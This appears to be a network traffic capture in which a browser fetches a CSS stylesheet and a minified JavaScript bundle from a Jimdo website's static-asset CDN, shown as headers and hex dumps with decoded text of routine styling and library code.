2024-04-18 17:39:05 UTC	609	OUT	GET /renderer/static/d330293187a93ee79023.css HTTP/1.1 Host: jimdo-dolphin-static-assets-prod.freetls.fastly.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:06 UTC	730	IN	HTTP/1.1 200 OK Connection: close Content-Length: 130635 x-amz-id-2: J1BRJ9RaEXEIwr0396WEx00XRT0bFYpJ1gdGCqvy90SVLlB304Xt3QEbm6YkWcsN7Jn4tZRnznA= x-amz-request-id: QJMX0R8G6W95DAAZ Last-Modified: Thu, 18 Apr 2024 13:33:09 GMT ETag: "6af2f468f86afd3e8d09236cf61c7716" x-amz-server-side-encryption: AES256 x-amz-version-id: LFGadD7A3p8upA1irYPOSezQXJDRWRMh Content-Type: text/css Via: 1.1 varnish, 1.1 varnish Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Age: 0 Date: Thu, 18 Apr 2024 17:39:06 GMT X-Served-By: cache-fra-eddf8230135-FRA, cache-pdk-kfty2130070-PDK X-Cache: HIT, MISS X-Cache-Hits: 0, 0 X-Timer: S1713461946.772343,VS0,VE233 Vary: Accept-Encoding
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 2e 6c 37 4c 79 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 33 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 65 77 2d 51 56 7b 7a 2d 69 6e 64 65 78 3a 34 7d 2e 6e 74 76 6b 6b 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 0a 0a 2e 41 38 52 42 4c 7b 63 6f 6c 6f 72 3a 23 33 32 33 33 33 35 7d 2e 41 38 52 42 4c 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 35 33 35 33 35 33 7d 2e 5f 36 4c 37 32 66 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 5f 36 4c 37 32 66 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 64 63 64 63 64 63 7d 0a 2e 5f 36 4f 55 36 78 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f Data Ascii: .l7Lyt{position:relative;z-index:3;width:100%}.ew-QV{z-index:4}.ntvkk{display:flex;flex-direction:column}.A8RBL{color:#323335}.A8RBL a:hover{color:#535353}._6L72f{color:#fff}._6L72f a:hover{color:#dcdcdc}._6OU6x{word-wrap:break-word;word-break:break-wo
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 74 74 6f 6d 3a 33 30 70 78 3b 6c 65 66 74 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 64 43 6a 54 62 20 2e 77 4e 4e 64 41 20 2e 73 37 34 4d 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 7d 2e 64 43 6a 54 62 20 2e 77 4e 4e 64 41 20 2e 73 31 78 62 64 7b 77 69 64 74 68 3a 36 30 70 78 3b 68 65 69 67 68 74 3a 31 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 72 65 6e 64 65 72 65 72 2f 73 74 61 74 69 63 2f 73 70 6f 74 69 66 79 2d 6c 6f 67 6f 2e 65 65 39 32 66 63 65 36 Data Ascii: ttom:30px;left:0;display:flex;align-items:center;justify-content:center;width:100%;pointer-events:none}.dCjTb .wNNdA .s74Mg{display:inline-flex;margin:0 15px}.dCjTb .wNNdA .s1xbd{width:60px;height:18px;background:url(/renderer/static/spotify-logo.ee92fce6
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 6c 70 70 4e 4a 2e 68 6c 39 68 49 20 2e 4c 59 51 77 67 2c 2e 5f 33 6d 55 46 64 2e 68 6c 39 68 49 20 2e 4c 59 51 77 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 7d 2e 6c 70 70 4e 4a 2e 68 6c 39 68 49 3a 66 6f 63 75 73 20 2e 4c 59 51 77 67 2c 2e 6c 70 70 4e 4a 2e 68 6c 39 68 49 3a 68 6f 76 65 72 20 2e 4c 59 51 77 67 2c 2e 5f 33 6d 55 46 64 2e 68 6c 39 68 49 3a 66 6f 63 75 73 20 2e 4c 59 51 77 67 2c 2e 5f 33 6d 55 46 64 2e 68 6c 39 68 49 3a 68 6f 76 65 72 20 2e 4c 59 51 77 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 31 29 7d 2e 4c 59 51 77 67 7b 70 61 64 64 69 6e 67 3a 31 36 70 78 20 33 Data Ascii: :rgba(0,0,0,.1)}.lppNJ.hl9hI .LYQwg,._3mUFd.hl9hI .LYQwg{background-color:hsla(0,0%,100%,0)}.lppNJ.hl9hI:focus .LYQwg,.lppNJ.hl9hI:hover .LYQwg,._3mUFd.hl9hI:focus .LYQwg,._3mUFd.hl9hI:hover .LYQwg{background-color:hsla(0,0%,100%,.1)}.LYQwg{padding:16px 3
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 2e 46 45 48 69 6a 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 38 30 30 70 78 29 7b 2e 5f 34 6f 74 6a 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e 68 65 72 69 74 7d 2e 43 35 59 42 68 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 7d 7d 0a 2e 48 76 6d 49 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 32 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 36 30 70 78 20 32 30 70 78 7d 2e 5f 35 66 53 37 39 7b 64 69 73 70 6c 61 79 3a 66 6c Data Ascii: .FEHij{display:flex;flex-direction:column}@media only screen and (max-width:800px){._4otjx{text-align:inherit}.C5YBh{margin-right:20px}}.HvmIt{position:relative;z-index:2;box-sizing:border-box;width:100%;margin:0 auto;padding:60px 20px}._5fS79{display:fl
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 7d 2e 75 31 4c 65 4e 2e 41 41 6e 47 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 36 65 37 66 30 7d 2e 75 31 4c 65 4e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 30 7d 2e 52 77 7a 67 50 2e 49 71 30 70 36 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 52 77 7a 67 50 20 2e 75 31 4c 65 4e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 36 65 37 66 30 7d 2e 5c 2b 62 50 4c 6f 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 7d 2e 73 55 63 52 73 7b 66 6c 65 78 3a 31 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 Data Ascii: }.u1LeN.AAnGe{border-color:#e6e7f0}.u1LeN:first-child{border-top:0}.RwzgP.Iq0p6{margin-top:20px}.RwzgP .u1LeN:first-child{border-top:1px solid #e6e7f0}.\+bPLo{display:flex;padding:10px 0}.sUcRs{flex:1;box-sizing:border-box}@media only screen and (max-widt
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 4b 42 4d 33 61 2e 54 74 50 65 65 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 2e 4b 42 4d 33 61 2e 59 41 34 73 6b 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 5f 30 78 30 70 59 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 38 30 70 78 29 7b 2e 4f 38 49 45 74 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 47 51 72 6d Data Ascii: x;padding-right:30px;padding-bottom:20px;transition:opacity .2s ease-in-out}.KBM3a.TtPee{padding-right:0}.KBM3a.YA4sk{opacity:0}._0x0pY{padding-bottom:10px}@media only screen and (max-width:1280px){.O8IEt{flex-direction:column;align-items:flex-start}.GQrm
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 58 4f 52 6c 41 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 36 2e 32 35 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 58 4f 52 6c 41 2e 72 76 78 42 63 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 30 25 7d 2e 58 4f 52 6c 41 2e 5f 39 61 65 4c 61 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 33 2e 33 33 33 25 7d 2e 58 4f 52 6c 41 2e 6d 7a 5a 56 79 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 30 25 7d 2e 58 4f 52 6c 41 2e 5f 32 35 75 65 51 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 37 35 25 7d 2e 68 6c Data Ascii: height:100%}.XORlA{position:relative;width:100%;height:0;padding-bottom:56.25%;overflow:hidden;background-color:#000}.XORlA.rvxBc{padding-bottom:100%}.XORlA._9aeLa{padding-bottom:33.333%}.XORlA.mzZVy{padding-bottom:60%}.XORlA._25ueQ{padding-bottom:75%}.hl
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 4e 43 46 72 2e 47 68 37 55 52 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 7d 2e 48 4e 43 46 72 2e 54 6c 63 77 4f 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 30 25 7d 2e 74 67 76 77 58 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 69 6e 73 65 74 3a 30 7d 2e 49 56 65 5c 2b 48 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 52 67 47 4d 45 20 2e 49 56 65 5c 2b 48 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 7d 0a 2e 47 63 71 2d 2d 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 47 63 71 2d 2d 2e 6a 77 32 38 37 3a 68 6f 76 65 72 20 2e 72 73 34 46 4a 2e 42 55 48 37 30 7b 66 69 6c 6c 3a 23 35 33 35 33 35 33 7d 2e 47 63 71 Data Ascii: NCFr.Gh7UR{align-items:flex-end}.HNCFr.TlcwO{padding-bottom:60%}.tgvwX{position:absolute;inset:0}.IVe\+H{display:flex;height:auto}.RgGME .IVe\+H{width:100%;height:100%;object-fit:cover}.Gcq--{display:flex}.Gcq--.jw287:hover .rs4FJ.BUH70{fill:#535353}.Gcq
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 49 65 7b 61 6c 6c 3a 69 6e 69 74 69 61 6c 3b 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 63 69 72 63 6c 65 28 30 29 3b 63 6c 69 70 2d 70 61 74 68 3a 63 69 72 63 6c 65 28 30 29 3b 68 65 69 67 68 74 3a 31 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 70 78 7d 2e 5f 31 42 32 5a 33 2c 2e 5c 2b 45 63 30 47 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5c 2b 45 63 30 47 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 5f 31 42 32 5a 33 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 31 Data Ascii: Ie{all:initial;-webkit-clip-path:circle(0);clip-path:circle(0);height:1px;position:absolute;white-space:nowrap;width:1px}._1B2Z3,.\+Ec0G{display:block}.\+Ec0G{margin-bottom:10px;font-size:18px}._1B2Z3{box-sizing:border-box;width:100%;padding:15px;border:1
2024-04-18 17:39:06 UTC	1379	IN	Data Raw: 72 2d 2d 66 6f 63 75 73 3a 76 61 72 28 2d 2d 50 68 6f 6e 65 49 6e 70 75 74 2d 63 6f 6c 6f 72 2d 2d 66 6f 63 75 73 29 3b 2d 2d 50 68 6f 6e 65 49 6e 70 75 74 43 6f 75 6e 74 72 79 53 65 6c 65 63 74 41 72 72 6f 77 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 2d 2d 50 68 6f 6e 65 49 6e 70 75 74 43 6f 75 6e 74 72 79 46 6c 61 67 2d 61 73 70 65 63 74 52 61 74 69 6f 3a 31 2e 35 3b 2d 2d 50 68 6f 6e 65 49 6e 70 75 74 43 6f 75 6e 74 72 79 46 6c 61 67 2d 68 65 69 67 68 74 3a 31 65 6d 3b 2d 2d 50 68 6f 6e 65 49 6e 70 75 74 43 6f 75 6e 74 72 79 46 6c 61 67 2d 62 6f 72 64 65 72 57 69 64 74 68 3a 31 70 78 3b 2d 2d 50 68 6f 6e 65 49 6e 70 75 74 43 6f 75 6e 74 72 79 46 6c 61 67 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c Data Ascii: r--focus:var(--PhoneInput-color--focus);--PhoneInputCountrySelectArrow-transform:rotate(45deg);--PhoneInputCountryFlag-aspectRatio:1.5;--PhoneInputCountryFlag-height:1em;--PhoneInputCountryFlag-borderWidth:1px;--PhoneInputCountryFlag-borderColor:rgba(0,0,

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:05 UTC	594	OUT	GET /renderer/static/b98099b58f789b786e66.js HTTP/1.1 Host: jimdo-dolphin-static-assets-prod.freetls.fastly.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:05 UTC	739	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3243055 x-amz-id-2: vFtL3pJ2UfHAY5qJ8xES/1gW2VOkCwOKDRfS/Xi7lLIux5M9/L8Tm7FJ5DjZc5HRAd7v2L8h8Bc= x-amz-request-id: 8328QF2EPG5V6PT5 Last-Modified: Thu, 18 Apr 2024 11:56:09 GMT ETag: "d1452656b56d9586c0c3945ffd6cfa85" x-amz-server-side-encryption: AES256 x-amz-version-id: OMV3KmbbmowFHKGUMEpWX1qO.Xs8IeCg Content-Type: text/javascript Via: 1.1 varnish, 1.1 varnish Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Age: 19583 Date: Thu, 18 Apr 2024 17:39:05 GMT X-Served-By: cache-fra-eddf8230078-FRA, cache-pdk-kfty2130064-PDK X-Cache: HIT, HIT X-Cache-Hits: 1, 0 X-Timer: S1713461946.777159,VS0,VE1 Vary: Accept-Encoding
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 62 39 38 30 39 39 62 35 38 66 37 38 39 62 37 38 36 65 36 36 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 6e 2c 69 2c 6f 3d 7b 32 34 36 35 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 28 32 36 32 30 35 29 2e 43 6f 6f 6b 69 65 3b 76 61 72 20 69 3d 6e 28 34 31 38 32 30 29 3b 74 2e 51 4e 3d 69 2e 43 4b 69 65 73 2c 69 2e 43 6f 6f 6b 69 65 4f 70 74 69 6f 6e 73 2c 69 2e 43 6f 6f 6b 69 65 54 79 70 65 7d 2c 34 31 38 32 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c Data Ascii: /! For license information please see b98099b58f789b786e66.js.LICENSE.txt /(()=>{var e,t,n,i,o={24656:(e,t,n)=>{"use strict";n(26205).Cookie;var i=n(41820);t.QN=i.CKies,i.CookieOptions,i.CookieType},41820:(e,t,n)=>{"use strict";Object.defineProperty(t,
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 72 65 74 75 72 6e 20 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 22 3b 20 22 2b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 2e 73 70 6c 69 74 28 22 3b 20 22 2b 65 2b 22 3d 22 29 3b 72 65 74 75 72 6e 20 74 26 26 32 3d 3d 3d 74 2e 6c 65 6e 67 74 68 3f 28 74 2e 70 6f 70 28 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 3b 22 29 2e 73 68 69 66 74 28 29 3a 6e 75 6c 6c 7d 2c 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 64 6f 63 75 6d Data Ascii: {"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n=function(){function e(){}return e.get=function(e){var t=("; "+document.cookie).split("; "+e+"=");return t&&2===t.length?(t.pop()\|\|"").split(";").shift():null},e.set=function(e,t,n){docum
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 3e 5c 6e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 64 3d 22 4d 31 35 2e 37 31 32 20 38 2e 37 30 37 6c 2d 35 2e 30 30 34 20 35 2e 30 30 34 61 2e 39 39 34 2e 39 39 34 20 30 20 30 20 31 2d 2e 37 30 36 2e 32 39 32 2e 39 39 35 2e 39 39 35 20 30 20 30 20 31 2d 2e 37 30 37 2d 2e 32 39 32 4c 34 2e 32 39 33 20 38 2e 37 30 37 61 2e 39 39 39 2e 39 39 39 20 30 20 31 20 31 20 31 2e 34 31 34 2d 31 2e 34 31 34 6c 34 2e 32 39 35 20 34 2e 32 39 38 20 34 2e 32 39 36 2d 34 2e 32 39 38 61 2e 39 39 39 2e 39 39 39 20 30 20 31 20 31 20 31 2e 34 31 34 Data Ascii: g" width="20" height="20" viewBox="0 0 20 20">\n<path fill="currentColor" fill-rule="nonzero" d="M15.712 8.707l-5.004 5.004a.994.994 0 0 1-.706.292.995.995 0 0 1-.707-.292L4.293 8.707a.999.999 0 1 1 1.414-1.414l4.295 4.298 4.296-4.298a.999.999 0 1 1 1.414
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 79 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 4d 65 74 61 53 63 68 65 6d 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 53 63 68 65 6d 61 28 65 2c 74 2c 6e 2c 21 30 29 2c 74 68 69 73 7d 2c 79 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 69 64 61 74 65 53 63 68 65 6d 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 24 73 63 68 65 6d 61 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6e 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 6e 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 24 73 63 68 65 6d 61 20 6d 75 73 74 20 62 65 20 61 20 73 74 72 69 6e 67 22 29 3b 69 66 28 21 28 6e 3d 6e 7c 7c 74 68 69 73 2e 5f 6f 70 74 73 2e 64 65 66 61 75 6c 74 4d 65 74 61 7c 7c 66 75 6e 63 74 69 Data Ascii: y.prototype.addMetaSchema=function(e,t,n){return this.addSchema(e,t,n,!0),this},y.prototype.validateSchema=function(e,t){var n=e.$schema;if(void 0!==n&&"string"!=typeof n)throw new Error("$schema must be a string");if(!(n=n\|\|this._opts.defaultMeta\|\|functi
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 3a 76 61 72 20 6e 3d 74 68 69 73 2e 5f 6f 70 74 73 2e 73 65 72 69 61 6c 69 7a 65 2c 69 3d 6e 3f 6e 28 65 29 3a 65 3b 74 68 69 73 2e 5f 63 61 63 68 65 2e 64 65 6c 28 69 29 3b 76 61 72 20 61 3d 74 68 69 73 2e 5f 67 65 74 49 64 28 65 29 3b 61 26 26 28 61 3d 6f 2e 6e 6f 72 6d 61 6c 69 7a 65 49 64 28 61 29 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 5f 73 63 68 65 6d 61 73 5b 61 5d 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 5f 72 65 66 73 5b 61 5d 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 79 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 46 6f 72 6d 61 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 6e 65 77 20 52 65 67 45 78 70 28 74 29 29 2c 74 68 69 73 2e 5f 66 6f 72 6d 61 74 73 5b Data Ascii: :var n=this._opts.serialize,i=n?n(e):e;this._cache.del(i);var a=this._getId(e);a&&(a=o.normalizeId(a),delete this._schemas[a],delete this._refs[a])}return this},y.prototype.addFormat=function(e,t){return"string"==typeof t&&(t=new RegExp(t)),this._formats[
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 61 6c 52 65 66 73 29 7d 63 61 74 63 68 28 74 29 7b 74 68 72 6f 77 20 64 65 6c 65 74 65 20 65 2e 76 61 6c 69 64 61 74 65 2c 74 7d 66 69 6e 61 6c 6c 79 7b 65 2e 63 6f 6d 70 69 6c 69 6e 67 3d 21 31 2c 65 2e 6d 65 74 61 26 26 28 74 68 69 73 2e 5f 6f 70 74 73 3d 6e 29 7d 72 65 74 75 72 6e 20 65 2e 76 61 6c 69 64 61 74 65 3d 6f 2c 65 2e 72 65 66 73 3d 6f 2e 72 65 66 73 2c 65 2e 72 65 66 56 61 6c 3d 6f 2e 72 65 66 56 61 6c 2c 65 2e 72 6f 6f 74 3d 6f 2e 72 6f 6f 74 2c 6f 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 69 64 61 74 65 2c 6e 3d 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 61 2e 65 72 72 6f 72 73 3d 74 2e 65 72 72 6f 72 73 2c 6e 7d 7d 2c 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 Data Ascii: alRefs)}catch(t){throw delete e.validate,t}finally{e.compiling=!1,e.meta&&(this._opts=n)}return e.validate=o,e.refs=o.refs,e.refVal=o.refVal,e.root=o.root,o;function a(){var t=e.validate,n=t.apply(this,arguments);return a.errors=t.errors,n}},y.prototype.c
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 65 6e 67 74 68 3b 6e 2b 2b 29 64 65 6c 65 74 65 20 74 5b 68 5b 6e 5d 5d 3b 72 65 74 75 72 6e 20 74 7d 28 74 68 69 73 29 2c 65 2e 66 6f 72 6d 61 74 73 26 26 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 2e 5f 6f 70 74 73 2e 66 6f 72 6d 61 74 73 29 7b 76 61 72 20 6e 3d 65 2e 5f 6f 70 74 73 2e 66 6f 72 6d 61 74 73 5b 74 5d 3b 65 2e 61 64 64 46 6f 72 6d 61 74 28 74 2c 6e 29 7d 7d 28 74 68 69 73 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 69 66 28 65 2e 5f 6f 70 74 73 2e 24 64 61 74 61 26 26 28 74 3d 6e 28 38 31 37 34 37 29 2c 65 2e 61 64 64 4d 65 74 61 53 63 68 65 6d 61 28 74 2c 74 2e 24 69 64 2c 21 30 29 29 2c 21 31 21 3d 3d 65 2e 5f 6f 70 74 73 2e 6d 65 74 61 29 7b 76 61 72 20 69 3d 6e 28 35 33 32 30 36 29 3b Data Ascii: ength;n++)delete t[h[n]];return t}(this),e.formats&&function(e){for(var t in e._opts.formats){var n=e._opts.formats[t];e.addFormat(t,n)}}(this),function(e){var t;if(e._opts.$data&&(t=n(81747),e.addMetaSchema(t,t.$id,!0)),!1!==e._opts.meta){var i=n(53206);
